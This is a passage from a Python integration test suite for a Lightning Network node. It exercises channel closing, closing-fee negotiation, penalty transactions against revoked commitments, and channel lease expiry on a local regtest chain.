'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
]
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
l2.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
# The entry in the channels table should still be there
assert l1.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert l2.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
def test_closing_while_disconnected(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
fut = executor.submit(l1.rpc.close, chan, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
fut.result(TIMEOUT)
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_disconnected_notify(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l2.stop()
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
out = subprocess.check_output(['cli/lightning-cli',
'--network={}'.format(TEST_NETWORK),
'--lightning-dir={}'
.format(l1.daemon.lightning_dir),
'close',
l2.info['id'],
'5']).decode('utf-8').splitlines()
assert out[0] == '# peer is offline, will negotiate once they reconnect (5 seconds before unilateral close).'
assert out[1] == '# Timed out, forcing close.'
assert not any([line.startswith('#') for line in out[2:]])
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fundchannel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@pytest.mark.slow_test
def test_closing_torture(node_factory, executor, bitcoind):
# We set up a fully-connected mesh of N nodes, then try
# closing them all at once.
amount = 10**6
num_nodes = 10 # => 45 channels (36 seconds on my laptop)
if node_factory.valgrind:
num_nodes -= 4 # => 15 (135 seconds)
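    # A full mesh of N nodes has N*(N-1)/2 channels: 10 nodes -> 45, 6 nodes -> 15.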
nodes = node_factory.get_nodes(num_nodes)
# Make sure bitcoind has plenty of utxos
bitcoind.generate_block(num_nodes)
# Give them all plenty of UTXOs, make sure they see them
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
addr = nodes[i].rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txs = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
nodes[i].rpc.connect(nodes[j].info['id'], 'localhost', nodes[j].port)
txs.append(nodes[i].rpc.fundchannel(nodes[j].info['id'], amount)['txid'])
# Make sure they're all in, then lock them in.
bitcoind.generate_block(1, wait_for_mempool=txs)
# Wait for them all to be CHANNELD_NORMAL
for n in nodes:
wait_for(lambda: all(p['channels'][0]['state'] == 'CHANNELD_NORMAL' for p in n.rpc.listpeers()['peers']))
# Start closers: can take a long time under valgrind!
futures = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
futures.append(executor.submit(nodes[i].rpc.close, nodes[j].info['id']))
futures.append(executor.submit(nodes[j].rpc.close, nodes[i].info['id']))
# Wait for close to finish
close_txs = set()
for f in futures:
# If one side completes closing, we'll get an error here 'Peer has no active channel'
try:
close_txs.add(f.result(TIMEOUT)['txid'])
except RpcError as err:
assert err.error['message'] == 'Peer has no active channel'
# Should have one close for each open.
assert len(close_txs) == len(txs)
# Get closes confirmed
bitcoind.generate_block(100, wait_for_mempool=list(close_txs))
# And make sure they hangup.
for n in nodes:
wait_for(lambda: n.rpc.listpeers()['peers'] == [])
@pytest.mark.slow_test
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/11000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 11000, 15000, 7400], [8000, 6000, 1001, 100]]
balance = [False, True]
num_peers = len(feerates) * len(balance)
addr = l1.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for b in balance:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.balance = balance
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.balance:
l1.pay(p, 100000000)
# Now close all channels (not unilaterally!)
closes = [executor.submit(l1.rpc.close, p.channel, 0) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'@WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'may_reconnect': True},
{'may_reconnect': True}])
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
l1.rpc.close(l2.info['id'])
l1.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
# Now verify that the closing tx is in the mempool.
bitcoind.generate_block(6, wait_for_mempool=1)
sync_blockheight(bitcoind, [l1, l2])
for n in [l1, l2]:
# Ensure we actually got a mutual close.
n.daemon.wait_for_log(r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_specified_destination(node_factory, bitcoind, chainparams):
l1, l2, l3, l4 = node_factory.get_nodes(4)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.rpc.connect(l4.info['id'], 'localhost', l4.port)
chan12, _ = l1.fundchannel(l2, 10**6)
chan13, _ = l1.fundchannel(l3, 10**6)
chan14, _ = l1.fundchannel(l4, 10**6)
l1.pay(l2, 100000000)
l1.pay(l3, 100000000)
l1.pay(l4, 100000000)
bitcoind.generate_block(5)
addr = chainparams['example_addr']
l1.rpc.close(chan12, None, addr)
l1.rpc.call('close', {'id': chan13, 'destination': addr})
l1.rpc.call('close', [chan14, None, addr])
l1.daemon.wait_for_logs([' to CLOSINGD_SIGEXCHANGE'] * 3)
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == 3)
# Now grab the close transaction
closetxs = {}
for i, n in enumerate([l2, l3, l4]):
billboard = only_one(l1.rpc.listpeers(n.info['id'])['peers'][0]['channels'])['status'][0]
m = re.search(r'CLOSINGD_SIGEXCHANGE.* tx:([a-f0-9]{64})', billboard)
closetxs[n] = m.group(1)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
    # l1 can't spend the output to addr.
for txid in closetxs.values():
assert not l1.daemon.is_in_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
# Check the txid has at least 1 confirmation
for n, txid in closetxs.items():
n.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
for n in [l2, l3, l4]:
# Make sure both nodes have grabbed their close tx funds
closetx = closetxs[n]
outputs = n.rpc.listfunds()['outputs']
assert closetx in set([o['txid'] for o in outputs])
output_num2 = [o for o in outputs if o['txid'] == closetx][0]['output']
output_num1 = 0 if output_num2 == 1 else 1
        # Check that the other output address is addr
assert addr == scriptpubkey_addr(bitcoind.rpc.gettxout(closetx, output_num1)['scriptPubKey'])
assert 1 == bitcoind.rpc.gettxout(closetx, output_num1)['confirmations']
def closing_negotiation_step(node_factory, bitcoind, chainparams, opts):
def feerate_for(target, minimum=0, maximum=10000000):
"""Binary search to find feerate"""
assert minimum != maximum
mid = (minimum + maximum) // 2
mid_fee = closing_fee(mid, 1)
if mid_fee > target:
return feerate_for(target, minimum, mid)
elif mid_fee < target:
return feerate_for(target, mid, maximum)
else:
return mid
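    # e.g. feerate_for(21000) bisects for a feerate whose closing_fee(feerate, 1)
    # equals 21000 satoshi, matching the negotiation start points noted below.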
orate = feerate_for(21000) # closing fee negotiation starts at 21000
prate = feerate_for(20000) # closing fee negotiation starts at 20000
opener, peer = node_factory.line_graph(2, opts=[{'feerates': (orate, orate, orate, orate)},
{'feerates': (prate, prate, prate, prate)}])
opener_id = opener.info['id']
peer_id = peer.info['id']
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
if opts['close_initiated_by'] == 'opener':
opener.rpc.close(peer_id=peer_id, fee_negotiation_step=opts['fee_negotiation_step'])
else:
assert opts['close_initiated_by'] == 'peer'
peer.rpc.close(peer_id=opener_id, fee_negotiation_step=opts['fee_negotiation_step'])
# Get the proclaimed closing fee from the two nodes' statuses
status_agreed_regex = re.compile("agreed on a closing fee of ([0-9]+) satoshi")
# [fee_from_opener_status, fee_from_peer_status]
fees_from_status = [None, None]
def get_fee_from_status(node, peer_id, i):
nonlocal fees_from_status
peer = only_one(node.rpc.listpeers(peer_id)['peers'])
channel = only_one(peer['channels'])
status = channel['status'][0]
m = status_agreed_regex.search(status)
if not m:
return False
fees_from_status[i] = int(m.group(1))
return True
wait_for(lambda: get_fee_from_status(opener, peer_id, 0))
wait_for(lambda: get_fee_from_status(peer, opener_id, 1))
assert opts['expected_close_fee'] == fees_from_status[0]
assert opts['expected_close_fee'] == fees_from_status[1]
# Get the closing transaction from the bitcoind mempool and get its fee
mempool = None
mempool_tx_ids = None
def get_mempool_when_size_1():
nonlocal mempool, mempool_tx_ids
mempool = bitcoind.rpc.getrawmempool(True)
mempool_tx_ids = list(mempool.keys())
return len(mempool_tx_ids) == 1
wait_for(get_mempool_when_size_1)
close_tx_id = mempool_tx_ids[0]
fee_mempool = round(mempool[close_tx_id]['fee'] * 10**8)
assert opts['expected_close_fee'] == fee_mempool
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_30pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 30%"""
opts = {}
opts['fee_negotiation_step'] = '30%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20537 if not chainparams['elements'] else 26046
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20233 if not chainparams['elements'] else 25657
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_100pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 100%"""
opts = {}
opts['fee_negotiation_step'] = '100%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20001 if not chainparams['elements'] else 25366
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
# The close fee of 20499 looks strange in this case - one would expect
# to have a number close to 21000. This is because
# * the range is initially set to [20000 (peer), 21000 (opener)]
# * the opener is always first to propose, he uses 50% step, so he proposes 20500
# * the range is narrowed to [20001, 20499] and the peer proposes 20499
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499 if not chainparams['elements'] else 25998
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_1sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 1sat"""
opts = {}
opts['fee_negotiation_step'] = '1'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20989 if not chainparams['elements'] else 26624
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20010 if not chainparams['elements'] else 25373
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_700sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 700sat"""
opts = {}
opts['fee_negotiation_step'] = '700'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20151 if not chainparams['elements'] else 25650
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499 if not chainparams['elements'] else 25998
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@pytest.mark.developer("needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an incoming HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': ['=WIRE_COMMITMENT_SIGNED-nocommit'],
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'disconnect': ['=WIRE_COMMITMENT_SIGNED-nocommit'],
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('got commitsig')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
# The first needle will match, but since we don't have a direct output
# for l2 it won't result in an output, hence the comment:
# r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an outgoing HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': ['=WIRE_COMMITMENT_SIGNED*3-nocommit'],
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'disconnect': ['=WIRE_COMMITMENT_SIGNED*3-nocommit'],
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l2, channel_id) == 0
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_falls_behind(node_factory, bitcoind):
'''
If our peer falls too far behind/doesn't send us an update for
their blockheight, the lessor fails the channel
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# sink the funding transaction
bitcoind.generate_block(1)
# stop l1
l1.stop()
# advance blockchain 1008 blocks, the lessor should drop to chain
bitcoind.generate_block(1008)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_log('Offline peer is too far behind, terminating')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.developer("requres 'dev-queryrates'")
@pytest.mark.slow_test
def test_channel_lease_post_expiry(node_factory, bitcoind):
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True}
l1, l2, = node_factory.get_nodes(2, opts=opts)
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
# l1 leases a channel from l2
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
# l2 attempts to close a channel that it leased, should fail
with pytest.raises(RpcError, match=r'Peer leased this channel from us'):
l2.rpc.close(l1.get_channel_scid(l2))
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 115')
# We need to give l1-l2 time to update their blockheights
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(32)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
# l1<->l2 mutual close should work
chan = l1.get_channel_scid(l2)
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.rpc.close(chan)
l2.daemon.wait_for_log('State changed from CLOSINGD_SIGEXCHANGE to CLOSINGD_COMPLETE')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_unilat_closes(node_factory, bitcoind):
'''
Check that channel leases work
l1-l2: l1 leases funds from l2; l1 goes to chain unilaterally
l2-l3: l2 leases funds from l3; l3 goes to chain unilaterally
'''
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'funder-lease-requests-only': False}
l1, l2, l3 = node_factory.get_nodes(3, opts=opts)
# Allow l2 some warnings
l2.allow_warning = True
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l3.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# l2 leases a channel from l3
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
rates = l2.rpc.dev_queryrates(l3.info['id'], amount, amount)
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers']) == 0)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.rpc.fundchannel(l3.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate), minconf=0,
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
l3.daemon.wait_for_log('to CHANNELD_NORMAL')
